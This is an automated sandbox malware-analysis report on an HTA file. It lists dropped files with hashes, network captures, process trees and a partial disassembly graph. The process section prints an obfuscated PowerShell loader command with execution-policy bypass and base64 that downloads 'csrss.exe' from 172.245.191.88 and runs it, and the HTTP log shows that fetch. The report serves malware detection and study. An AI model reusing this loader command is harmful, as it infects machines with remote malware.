                                              Preview:L...4..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP.................w.._...*..$.^..........4.......C:\Users\user\AppData\Local\Temp\RESFA6B.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.p.l.2.e.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtqkobt2.05q.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcnqx3k3.dq5.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfj5lpnj.mgi.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1kv4jax.vg1.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.1004065432448833
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCvak7YnqqJIPN5Dlq5J:+RI+ycuZhN+akSmPNnqX
                                              MD5:CDEFBE77DDC15F05DBC72A7FED248B5E
                                              SHA1:3D596D82A4097968DC9BA8829B9A45827AE5F466
                                              SHA-256:2633B339723EF18BFCD4F78B71DDA536FD1385109D4057AA09E1F77761725B7C
                                              SHA-512:902D5A00B9B927E6076A770F70BE448D694643B52A7F14078E2843E27F496D315F42A230335EE0F954D2A4FD390C71D8D712E1C642E0BC4678A70B63C91AA6C6
                                              Malicious:false
                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.p.l.2.e.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.1.p.l.2.e.q.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                              C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.0.cs

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
                                              Category:dropped
                                              Size (bytes):485
                                              Entropy (8bit):3.8179586298986012
                                              Encrypted:false
                                              SSDEEP:6:V/DsYLDS81zust9iMmhQXReKJ8SRHy4HOW7ZCv7IIrxOFQy:V/DTLDfusXfXfHKqji5y
                                              MD5:211A5B49430B6CAA90A540990FF2AD2E
                                              SHA1:8D69C08B8E4FE212B5EE4FB8CECC5B7F6F8A8FFB
                                              SHA-256:3F46F52F3B3467520DF1CB84C1BD819594EFB57A8C0C766729F9E1676544CCA8
                                              SHA-512:8412865BF893D56CF63E3CBFE40AC41BD1E6468E210B3A656258CDF93C622B9B39B50A5E6AE4EF93307960DDC5FC7D0C098500152EA9B3AF417227A55C0C659D
                                              Malicious:false
                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace BHtY.{. public class tJVgxAyKo. {. [DllImport("uRlMON.DLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr mqhypVwGTeo,string JXgK,string Woj,uint tfuukZ,IntPtr QTuGN);.. }..}.

                                              C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                              Category:dropped
                                              Size (bytes):369
                                              Entropy (8bit):5.243831769386129
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f7Uzxs7+AEszIwkn23f7Rn:p37Lvkmb6KRfQWZEifNn
                                              MD5:0AE90BE6AD268293BE6A067F36F1CF6A
                                              SHA1:6084B5D84B54F1F5EB47176F659320B297A302FE
                                              SHA-256:102B8E5E67FDAEE339C8333CE0290CFBB9CFEA5E6099572AFF6C2FAD2F3CB48F
                                              SHA-512:5F8BE25E5EF52367C928044EA5AA0E74B0E359376263DC1B5565B7938DFA41056436991D86028FA170C32A61794FC723A4E65A8D4DEACF33B0CE5673CB75A49C
                                              Malicious:true
                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.0.cs"

                                              C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):3072
                                              Entropy (8bit):2.8463672799352424
                                              Encrypted:false
                                              SSDEEP:24:etGSL9PBe5ekrl8s1igkpjq3dm3AtkZfeybCZ0WI+ycuZhN+akSmPNnq:6LWskr+8kjz3JeybCZX1ul+a3aq
                                              MD5:0E12010E8CEE22178C474FBE369E8BFD
                                              SHA1:2348ADBC7169DD3B765C541C66F46F1C4C94D249
                                              SHA-256:7E173C68F133C5EB0E8D84FCF549406572F26D902C30E04BDCB02448C3C2ACAE
                                              SHA-512:5405AD540DC25B2898D120FA677D6D7B07532A8C119958B7986804A8E49C7B99F1AF450924964B180A7AC1A33388DC99F44719E72DBE95B540DC51C3FD8470CA
                                              Malicious:false
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4..g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....w.....w...........................!.............. =.....P ......O.........U.....a.....f.....j.....q...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.l1

                                              C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.out

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):867
                                              Entropy (8bit):5.325131463789254
                                              Encrypted:false
                                              SSDEEP:24:KJBqd3ka6KRfREifIKax5DqBVKVrdFAMBJTH:Cika6CREuIK2DcVKdBJj
                                              MD5:BED560B3628DD1ACC9DFDF14E8D7B76D
                                              SHA1:38B3839491653E03B15DFBC8DEFCCE64628022D5
                                              SHA-256:FC7E9BC8B084F32D32CD281405CF0FF90D2179A45D182288E98E8B948B1C415C
                                              SHA-512:0DD49AF034EC23F5F78796A36B4F16053306FA260F5B35D4A7EA32B3166A53DA004184A0EC7E33F4A5DBFCE1F8CAD8CCF742F3B616939B7D5944A769CE2184B0
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.306461250274409
                                              Encrypted:false
                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                              Malicious:false
                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                              Static File Info

                                              General

                                              File type:HTML document, ASCII text, with very long lines (14911), with CRLF line terminators
                                              Entropy (8bit):1.8320562508506997
                                              TrID:
                                              • HyperText Markup Language (15015/1) 100.00%
                                              File name:sdf.hta
                                              File size:15'079 bytes
                                              MD5:73f9f8f8c9738f49854820688beae627
                                              SHA1:467d5d213bd6f827aab35d5404eb01792bf19213
                                              SHA256:8335aea59fc0f9ed4542db9221ee7e2c5ea6d7df36fe31ba7fe04bff878717a0
                                              SHA512:1d47dc51214389c7791f5651f27aad1639a3df64a381ec92447599f788eb752ea9a690012a6b01be140dc3dc4b89f8398bdfbbcf983128edacfd0b6f5c853805
                                              SSDEEP:48:3PCAOdNN/HwrdNNgJHwB47wPnjRftdEpy7zUA+UZJbksLDMdNNhTdNNpHw4dNNd+:/CxdYrdjWMPjR0KQNUjbjMdRTdW4dN+
                                              TLSH:1F620D609C34EEA093E387525DCDE8F8D54D5F1B800149E7709C58A7D3A2A2894E57B3
                                              File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCRiPT LaNgUaGe="VBScRipt">..DIM

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 15, 2025 09:44:13.549175978 CEST4971480192.168.2.4172.245.191.88
                                              Apr 15, 2025 09:44:13.687292099 CEST8049714172.245.191.88192.168.2.4
                                              Apr 15, 2025 09:44:13.687536001 CEST4971480192.168.2.4172.245.191.88
                                              Apr 15, 2025 09:44:13.687726974 CEST4971480192.168.2.4172.245.191.88
                                              Apr 15, 2025 09:44:13.828901052 CEST8049714172.245.191.88192.168.2.4
                                              Apr 15, 2025 09:44:13.829050064 CEST4971480192.168.2.4172.245.191.88
                                              Apr 15, 2025 09:44:18.825237989 CEST8049714172.245.191.88192.168.2.4
                                              Apr 15, 2025 09:44:18.825294018 CEST4971480192.168.2.4172.245.191.88
                                              Apr 15, 2025 09:44:20.666430950 CEST4971480192.168.2.4172.245.191.88

                                              HTTP Request Dependency Graph

                                              • 172.245.191.88

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449714172.245.191.88807552C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 15, 2025 09:44:13.687726974 CEST287OUTGET /620/csrss.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                              Host: 172.245.191.88
                                              Connection: Keep-Alive
                                              Apr 15, 2025 09:44:13.828901052 CEST543INHTTP/1.1 404 Not Found
                                              Date: Tue, 15 Apr 2025 14:44:12 GMT
                                              Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                              Content-Length: 301
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 74 20 50 48 50 2f 38 2e 30 2e 32 38 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 32 34 35 2e 31 39 31 2e 38 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 172.245.191.88 Port 80</address></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:44:06
                                              Start date:15/04/2025
                                              Path:C:\Windows\SysWOW64\mshta.exe
                                              Wow64 process (32bit):true
                                              Commandline:mshta.exe "C:\Users\user\Desktop\sdf.hta"
                                              Imagebase:0xc70000
                                              File size:13'312 bytes
                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:1
                                              Start time:03:44:07
                                              Start date:15/04/2025
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
                                              Imagebase:0xc70000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:03:44:07
                                              Start date:15/04/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff62fc20000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:03:44:07
                                              Start date:15/04/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
                                              Imagebase:0x1e0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:44:11
                                              Start date:15/04/2025
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
                                              Imagebase:0xa0000
                                              File size:2'141'552 bytes
                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:03:44:11
                                              Start date:15/04/2025
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                              Imagebase:0x7ff6ca680000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:6
                                              Start time:03:44:11
                                              Start date:15/04/2025
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"
                                              Imagebase:0xc50000
                                              File size:46'832 bytes
                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:17%
                                                Total number of Nodes:47
                                                Total number of Limit Nodes:6
                                                execution_graph 10736 4be763f 10737 4be75da 10736->10737 10738 4be764b 10736->10738 10744 4be7da8 10737->10744 10748 4be7c45 10737->10748 10756 4be7a08 10737->10756 10765 4be7a18 10737->10765 10739 4be75df 10745 4be7cf9 10744->10745 10745->10744 10774 78545f4 10745->10774 10782 7854610 10745->10782 10750 4be7b9a 10748->10750 10753 4be7c5e 10748->10753 10749 4be7de8 URLDownloadToFileW 10752 4be7ea8 10749->10752 10750->10748 10750->10749 10752->10739 10754 78545f4 3 API calls 10753->10754 10755 7854610 3 API calls 10753->10755 10754->10753 10755->10753 10761 4be7a14 10756->10761 10758 4be7ea8 10758->10739 10759 4be7b30 10759->10739 10760 4be7de8 URLDownloadToFileW 10760->10758 10761->10759 10761->10760 10762 4be7c5e 10761->10762 10763 78545f4 3 API calls 10762->10763 10764 7854610 3 API calls 10762->10764 10763->10762 10764->10762 10770 4be7a1c 10765->10770 10767 4be7ea8 10767->10739 10768 4be7b30 10768->10739 10769 4be7de8 URLDownloadToFileW 10769->10767 10770->10768 10770->10769 10771 4be7c5e 10770->10771 10772 78545f4 3 API calls 10771->10772 10773 7854610 3 API calls 10771->10773 10772->10771 10773->10771 10776 7854610 10774->10776 10775 7854a93 10775->10745 10776->10775 10778 4be7a18 4 API calls 10776->10778 10779 4be7a08 4 API calls 10776->10779 10780 4be7c45 4 API calls 10776->10780 10790 4be1c00 10776->10790 10777 7854a34 10777->10745 10778->10777 10779->10777 10780->10777 10783 7854a93 10782->10783 10784 7854641 10782->10784 10783->10745 10784->10783 10786 4be7a18 4 API calls 10784->10786 10787 4be7a08 4 API calls 10784->10787 10788 4be7c45 4 API calls 10784->10788 10789 4be1c00 URLDownloadToFileW 10784->10789 10785 7854a34 10785->10745 10786->10785 10787->10785 10788->10785 10789->10785 10791 4be7e00 URLDownloadToFileW 10790->10791 10793 